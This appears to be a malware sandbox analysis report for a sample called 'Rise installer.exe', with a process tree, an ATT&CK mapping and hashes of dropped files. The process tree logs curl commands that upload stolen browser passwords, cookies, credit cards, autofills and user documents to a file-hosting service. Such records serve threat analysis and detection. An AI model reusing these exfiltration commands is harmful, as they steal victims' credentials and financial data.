- Suspicious behavior: EnumeratesProcesses
PID:6116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,15370600853320952962,16925404626898251327,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:1
2⤵
PID:2764

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3216

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5580

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5032

C:\Users\Admin\Desktop\Rise installer.exe
"C:\Users\Admin\Desktop\Rise installer.exe"
1⤵
PID:780

C:\Users\Admin\Desktop\Rise installer.exe
"C:\Users\Admin\Desktop\Rise installer.exe"
2⤵
- Drops startup file
- Loads dropped DLL
PID:916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:5064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:132

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store3.gofile.io/uploadFile"
3⤵
PID:5744

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store3.gofile.io/uploadFile
4⤵
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store3.gofile.io/uploadFile"
3⤵
PID:4328

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store3.gofile.io/uploadFile
4⤵
PID:1404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store3.gofile.io/uploadFile"
3⤵
PID:5380

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store3.gofile.io/uploadFile
4⤵
PID:5476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store3.gofile.io/uploadFile"
3⤵
PID:6080

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store3.gofile.io/uploadFile
4⤵
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store3.gofile.io/uploadFile"
3⤵
PID:1064

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store3.gofile.io/uploadFile
4⤵
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store3.gofile.io/uploadFile"
3⤵
PID:2720

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store3.gofile.io/uploadFile
4⤵
PID:6044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/CheckpointBackup.ADT" https://store3.gofile.io/uploadFile"
3⤵
PID:1188

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/CheckpointBackup.ADT" https://store3.gofile.io/uploadFile
4⤵
PID:3168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/MeasureBackup.docx" https://store3.gofile.io/uploadFile"
3⤵
PID:6040

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/MeasureBackup.docx" https://store3.gofile.io/uploadFile
4⤵
PID:4936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/MeasureBackup.dwg" https://store3.gofile.io/uploadFile"
3⤵
PID:6028

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin/Downloads/MeasureBackup.dwg" https://store3.gofile.io/uploadFile
4⤵
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.downloads.com/
1⤵
PID:3916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa49803cb8,0x7ffa49803cc8,0x7ffa49803cd8
2⤵
PID:3484

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5e027def9b55f3d49cde9fb82beba238

SHA1
64baabd8454c210162cbc3a90d6a2daaf87d856a

SHA256
9816e980b04f1fe7efaa4b9c83ff6a0fdd485ee65a884c001b43a0cad7c39d83

SHA512
a315e1336c5ec70cbb002969e539068ba92f3ec681b6d863db95227fd1808a778fd994e2fb03f28f0e401677aa5f7c66813e315b6b99a5065384c49586f9782e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0c5042350ee7871ccbfdc856bde96f3f

SHA1
90222f176bc96ec17d1bdad2d31bc994c000900c

SHA256
b8b1cb139d4d19a85adce0152fa3c4f6adfb73a322d7253820e848c6f82afc1b

SHA512
2efdb535fa6a06c4f9702b2129f2dd07c330e37fd10b492f2236007c660c1707773c22005d1e1fa580dbf633dc1a700ada3b7b611ef9accd9555a17a244f61ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022
Filesize
64KB

MD5
9ab10d71ba9d5687f36807e669b870d1

SHA1
e156f2cfdda7b5dcca0db32860759e954626e6f1

SHA256
7cdc09376d5fad31e928ac542ed83ed3ddfc5507180e94417b0cf4116b1c15e4

SHA512
c70c189dd7e515c2317a276319668073b8f73151bf7a1e0b6623ce888f590cebc7b7a69fd0b39cf7fb5206166202b6cf9b1baeec9c59ed9b3f926c7d7e13935e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
f286bdab2b6caa3ea923ac29f2314251

SHA1
9e314eb2553abf4a0e64b6f01a866702d757a77d

SHA256
61d3cf9b96f0f880f71432981e77812f6385d5dc8911aa7f7378611cc617e24e

SHA512
a50ad59742ab80d936df4bf86c6055ba1f0a6cd2ceb43398abe9c8f69ca2d359ca05b111222b4f24ca5766e1a964313a57b3373f5e1c5d921c3a0b96b03c07b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
11KB

MD5
3c23866d4cfc814d169608dec1f965a5

SHA1
ec8f2ca678d19c8f912bad412153e712211da417

SHA256
70167e53bd83c253a740572a63ccad9fa2f87a6fdfaea1936e98f667505fd436

SHA512
8903fb06bfd03fad478b91affd546b734d5df04e788f2e92fbabafe0f7e9d23b4dab4ab291ff44ca3bf754c998f55d8cf98d0e96f6739ec105008797e2a53c15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
4c912a760a9b376a904f6ee99f48475e

SHA1
e58c1ebf8561f93e766206794fbe2c3cc4f6dbb4

SHA256
3a23ab853a0ca1603f044b384126fcaf1de33084256d1d74568f8091aefe514f

SHA512
d9ec169f4f3614123874be936c9b7467dbe5298bbaff8ddeeae9669252fcafdee48e982b36b1bb4de6c71217231af6d3f41a057707715a66123d480f6689f773

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
13KB

MD5
e7f6eb279ec4bcb37f4b4bcdb64c68bf

SHA1
f90f49136a4b784c1b907b99c249bba96ab81891

SHA256
b2cbd74baff3b0664a033854e15efa255df440fbfc217af1808bca895c6ccd1e

SHA512
a9f78df533a60be245b60fa8581bcd421fbb101ccea36cc0f3ca72ea30d781d77b56c19b093affd72479e2b69e1d7ba7d70d4faf75f8f9a632bafb7c1fca74e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
12KB

MD5
e4bb13a23d9fd3abb089a092c8410671

SHA1
658982689413d8f05bc91a632bb8e024a0cd2149

SHA256
9a2c215bfe778d7d3b92716a4554d57fbebebf43cf01ca9e3b1303e1139e275c

SHA512
3d7673c0e7b6b62e225ccfa05b43ef902ad19e26c60c358ad6d2fc4f7f4ba5fcaf66375862385f456ce1c6bdbc29b17f5bd5deb3739f78b77b95cb73ccca5f76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
13KB

MD5
eadd99b7a9422d3ba1fd6edc71d76c60

SHA1
370113369ac3432c2f6a3c3716cfcd84b577e819

SHA256
772cbfeb18d4bdc2ca0b9612fa1e653701260f30d1f33078027c1ae7f1e19af9

SHA512
b9f508cef637ffb723fc4137716ab727af9c2368574fcde9529bdcc45b6b11991763005e47a2e959792833b393cbb5bb96977f9cb2dbb437befb7f33ec06a6c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
3KB

MD5
7d7dd12067c4f46b8070fc2974edea3e

SHA1
3012bb47d239bd40bac963f25f684b5cf1dcbe55

SHA256
595fd988ce0c6f194b7580c565cc8904cc53ab165cc926d9f335da2c711913f5

SHA512
813cfa71ee2dd2959ced2aef988409df2d0fd0df2e38f9bc08804a9bb2176fcd178f714700d273443967de099697bf61b8cea05c2404fe83a4f5a9a53ac41725

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
3KB

MD5
7ccae903d3a1b59519391b100824f365

SHA1
df296f7cedae733b8065d7bb996c526cb7eb8e93

SHA256
040a65f2ed36f1c2d744aeaf8acfa0f0cca68850bf526019ad37364b0819739c

SHA512
66a6869a60e0d8c1496499bb2f40f5d1974c1dcbacd11e10a9ecbbe478b8818ee795ff36249a4a100d9706cf3265f8933accad1467b5659cda76418c044ce402

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5806e1.TMP
Filesize
3KB

MD5
a731173dcd0e1e037fd722e989b39394

SHA1
acde38a18bdcde789b9a48a7ce476deb1c810336

SHA256
37f55889277cf2b55159f12c64cdf3174456146168b2bb9e57039deb33f52838

SHA512
fad21503f15cd573f4ceb7ff62ed38cc0d447d19650615432fe486377a7b740e2d0a886b51d7c6d94682737210329063e62cf83c48ab9b8179b04266e2df2631

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
2b6f594b1032d2cd32373f297c0e79cc

SHA1
adcfec4d0c64fc717255b7f7bf2d98ee4cbd11ee

SHA256
5bd4d4aa33866328359268d0362ad81273d9d141f63c27e04c93495c7efd558c

SHA512
9402fba45bfb24e5707d24f1484f1f10a3d288e34689dff1c47c0eb80e080682c8bb594e6badc74ddb7700b89365ffd06e26914e23e17c0de8f4e07a09ef5d24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
1efb88dc22369da09c729db2e4d00273

SHA1
b47990d26173a6c15a08d17617b082ac93ce287f

SHA256
5a109df28743dc762b80394e76fe2ca1ea7b38c980877681793473d9fb082898

SHA512
3dde80da4d286c42700d30dd6f5b1554958c7713c67e8995939c4029bfda441b63ddc826bd82eaa64df2f5db997b9fbd305e7fce5f53135d38504151f05bd9be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
c04d2ddf53a1655c0be58f76997fb57c

SHA1
43dff6c642ca7694cc3ddee4e4e8c995d927d10d

SHA256
748b8983abe160e0007d0975305f1f9a1aadf24f8b3bfd0bf958e9a64e45f38b

SHA512
01bf270fc104f77af48736a71ab382bf55c79b531110a683c9a8561ff904c6fe01cf1541806fd31f31693656bcb5875f7ec89ed9b634abb3cbb7ebe724929374

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
001d67588e1615740021f698a928176b

SHA1
d46c7e5f71fb53420bee9035a822a4eb7591a2ac

SHA256
6e41c486f779c0dbc01530326d39fd33457c90ea0c7c1844dfc3221b55ddb20d

SHA512
d315830a81de60484b2f20e7ae72f62e252bbf7d563c365f3b6ba9a33c3f939e739da70015fe29a5cddaba09c77f3be6b47edc43d8c4e348998ddacdd44bd84a

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize
10KB

MD5
394f971f95da279c2ebf1a4113ce8426

SHA1
74f73a16920c5919ccb7788e3c2429c291da34d3

SHA256
5555d03ce11acdeae26b199b7bdf7220be2f8a4668800c29644740857576659f

SHA512
1ea93d43096e70a182b4a5011b20b2a0c3558b907039c8ead7c3f89cc360b8ee635789b15398ef42f6a0c74a98d9f070290d5e98f786017e4d6bc3e25a042f33

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\VCRUNTIME140.dll
Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\VCRUNTIME140_1.dll
Filesize
48KB

MD5
f8dfa78045620cf8a732e67d1b1eb53d

SHA1
ff9a604d8c99405bfdbbf4295825d3fcbc792704

SHA256
a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

SHA512
ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\_asyncio.pyd
Filesize
63KB

MD5
07a6e6dcc30e1c4c7e0cdc41a457a887

SHA1
53bc820b63d88cbe889944e242b50662b4b2cb42

SHA256
746bc8fa88282afe19dc60e426cc0a75bea3bd137cca06a0b57a30bd31459403

SHA512
837f1e40db9bdf1bc73b2a700df6086a3acdb7d52afc903239410b2d226ffd1dd5e8b5f317401bcf58dd042bd56787af6cdc49af96fcb588bcf0127d536b6c6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\_bz2.pyd
Filesize
82KB

MD5
aa1083bde6d21cabfc630a18f51b1926

SHA1
e40e61dba19301817a48fd66ceeaade79a934389

SHA256
00b8ca9a338d2b47285c9e56d6d893db2a999b47216756f18439997fb80a56e3

SHA512
2df0d07065170fee50e0cd6208b0cc7baa3a295813f4ad02bec5315aa2a14b7345da4cdf7cac893da2c7fc21b201062271f655a85ceb51940f0acb99bb6a1d4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\_cffi_backend.cp311-win_amd64.pyd
Filesize
177KB

MD5
210def84bb2c35115a2b2ac25e3ffd8f

SHA1
0376b275c81c25d4df2be4789c875b31f106bd09

SHA256
59767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf

SHA512
cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\_ctypes.pyd
Filesize
121KB

MD5
565d011ce1cee4d48e722c7421300090

SHA1
9dc300e04e5e0075de4c0205be2e8aae2064ae19

SHA256
c148292328f0aab7863af82f54f613961e7cb95b7215f7a81cafaf45bd4c42b7

SHA512
5af370884b5f82903fd93b566791a22e5b0cded7f743e6524880ea0c41ee73037b71df0be9f07d3224c733b076bec3be756e7e77f9e7ed5c2dd9505f35b0e4f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\_decimal.pyd
Filesize
249KB

MD5
c88282908ba54510eda3887c488198eb

SHA1
94ed1b44f99642b689f5f3824d2e490252936899

SHA256
980a63f2b39cf16910f44384398e25f24482346a482addb00de42555b17d4278

SHA512
312b081a90a275465787a539e48412d07f1a4c32bab0f3aa024e6e3fe534ac9c07595238d51dc4d6f13c8d03c2441f788dff9fe3d7ca2aad3940609501d273bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\_hashlib.pyd
Filesize
63KB

MD5
b4ff25b1aca23d48897fc616e102e9b6

SHA1
8295ee478191eb5f741a5f6a3f4ab4576ceec8d2

SHA256
87dd0c858620287454fd6d31d52b6a48eddbb2a08e09e8b2d9fdb0b92200d766

SHA512
a7adcf652bc88f8878dae2742a37af75599936d80223e62fe74755d6bafaafd985678595872fb696c715f69a1f963f12e3d52cd3d7e7a83747983b2ee244e8a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\_lzma.pyd
Filesize
155KB

MD5
b86b9f292af12006187ebe6c606a377d

SHA1
604224e12514c21ab6db4c285365b0996c7f2139

SHA256
f5e01b516c2c23035f7703e23569dec26c5616c05a929b2580ae474a5c6722c5

SHA512
d4e97f554d57048b488bf6515c35fddadeb9d101133ee27a449381ebe75ac3556930b05e218473eba5254f3c441436e12f3d0166fb1b1e3cd7b0946d5efab312

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\base_library.zip
Filesize
1.4MB

MD5
8655a1dec8c488da57682f7242ca3c2d

SHA1
13a4778a0a1a4308cf7c001d7501817973da1a0b

SHA256
3d0c33dd160978b8234f520a944fcef69f41369ea87d48904a64e8c68f28d151

SHA512
e89ac49b26abde229b63632381c08d17fbef86be64c59e633a711782cc6b391c9d7c66192886f3d3b9b88a964e8dfac2d25169c009a3af3e4c8b5dc854ca726c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\libcrypto-3.dll
Filesize
5.0MB

MD5
e547cf6d296a88f5b1c352c116df7c0c

SHA1
cafa14e0367f7c13ad140fd556f10f320a039783

SHA256
05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

SHA512
9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\libffi-8.dll
Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\libssl-3.dll
Filesize
768KB

MD5
19a2aba25456181d5fb572d88ac0e73e

SHA1
656ca8cdfc9c3a6379536e2027e93408851483db

SHA256
2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006

SHA512
df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\pyexpat.pyd
Filesize
194KB

MD5
79561bc9f70383f8ae073802a321adfb

SHA1
5f378f47888e5092598c20c56827419d9f480fa7

SHA256
c7c7564f7f874fb660a46384980a2cf28bc3e245ca83628a197ccf861eab5560

SHA512
476c839f544b730c5b133e2ae08112144cac07b6dfb8332535058f5cbf54ce7ed4a72efb38e6d56007ae755694b05e81e247d0a10210c993376484a057f2217c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\python3.DLL
Filesize
65KB

MD5
7e07c63636a01df77cd31cfca9a5c745

SHA1
593765bc1729fdca66dd45bbb6ea9fcd882f42a6

SHA256
db84bc052cfb121fe4db36242ba5f1d2c031b600ef5d8d752cf25b7c02b6bac6

SHA512
8c538625be972481c495c7271398993cfe188e2f0a71d38fb51eb18b62467205fe3944def156d0ff09a145670af375d2fc974c6b18313fa275ce6b420decc729

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\python311.dll
Filesize
5.5MB

MD5
387bb2c1e40bde1517f06b46313766be

SHA1
601f83ef61c7699652dec17edd5a45d6c20786c4

SHA256
0817a2a657a24c0d5fbb60df56960f42fc66b3039d522ec952dab83e2d869364

SHA512
521cde6eaa5d4a2e0ef6bbfdea50b00750ae022c1c7bd66b20654c035552b49c9d2fac18ef503bbd136a7a307bdeb97f759d45c25228a0bf0c37739b6e897bad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\select.pyd
Filesize
29KB

MD5
e4ab524f78a4cf31099b43b35d2faec3

SHA1
a9702669ef49b3a043ca5550383826d075167291

SHA256
bae0974390945520eb99ab32486c6a964691f8f4a028ac408d98fa8fb0db7d90

SHA512
5fccfb3523c87ad5ab2cde4b9c104649c613388bc35b6561517ae573d3324f9191dd53c0f118b9808ba2907440cbc92aecfc77d0512ef81534e970118294cdee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\sqlite3.dll
Filesize
1.5MB

MD5
89c2845bd090082406649f337c0cca62

SHA1
956736454f9c9e1e3d629c87d2c330f0a4443ae9

SHA256
314bba62f4a1628b986afc94c09dc29cdaf08210eae469440fbf46bcdb86d3fd

SHA512
1c467a7a3d325f0febb0c6a7f8f7ce49e4f9e3c4514e613352ef7705a338be5e448c351a47da2fb80bf5fc3d37dbd69e31c935e7ff58ead06b2155a893728a82

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI7802\unicodedata.pyd
Filesize
1.1MB

MD5
fd9132f966ee6d214e0076bf0492fb30

SHA1
89b95957f002bf382435d015e26962a42032cb97

SHA256
37c68617fa02a2cadced17ef724e2d450ef12a8a37215da789a4679fde1c5c02

SHA512
e35729abc45e5561aae1fb9e0e7c711dd7d3c1491520aa5c44fcc50c955f549f81d90897959327e930d02a5356afe08d6195adf002c87801a7a11235670639b5

Download Submit
C:\Users\Admin\AppData\Local\Tempcrcddecdxx.db
Filesize
100KB

MD5
87358b776476af36303ae41fa3f8cbb5

SHA1
39d313afd8998ded266d88aa45db7c2986c93e7d

SHA256
c4e7e395e5d4be8f6ffc8df3ef5bcd27fbc66812485bebb5949d5e00313ec040

SHA512
62015f32cd5fdb7e8ed7486a5d076fbb271aa7ff57ee3c6ce48ae7d2a54a83eda5755b35c83116e82ecd7bac81a4eee325f2d8d4fd1b47182ef9c219425a6a17

Download Submit
C:\Users\Admin\AppData\Local\Tempcreywfbwug.db
Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Tempcrmwvjeupk.db
Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Tempcrrjxqvjbj.db
Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\Users\Admin\AppData\Local\Tempcrrvkmbcsu.db
Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Tempcrstyfofpm.db
Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\Users\Admin\Downloads\Riseinstaller.zip
Filesize
20.1MB

MD5
f62ad87c92cb19928da364ecc744bfcd

SHA1
f4458e44dc244ab051d09311e1dbb9e29d58a42b

SHA256
75538b5146169c7ec795100e43b5f7b3e3fd32d8abf5a86b8ecb14a415f1f979

SHA512
adb0a79dedf1354b96a1c6b8c2c251518d9298475fa4336477494fc105f4b37bc2764bd72c5ea3608b2b97a7cbb75c0bd319788d78d53d4e78aa1c356003f5a7

Download Submit
C:\Users\Admin\Downloads\Riseinstaller.zip:Zone.Identifier
Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
\??\pipe\LOCAL\crashpad_2704_KQEXMDZLVTJUSNZR
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit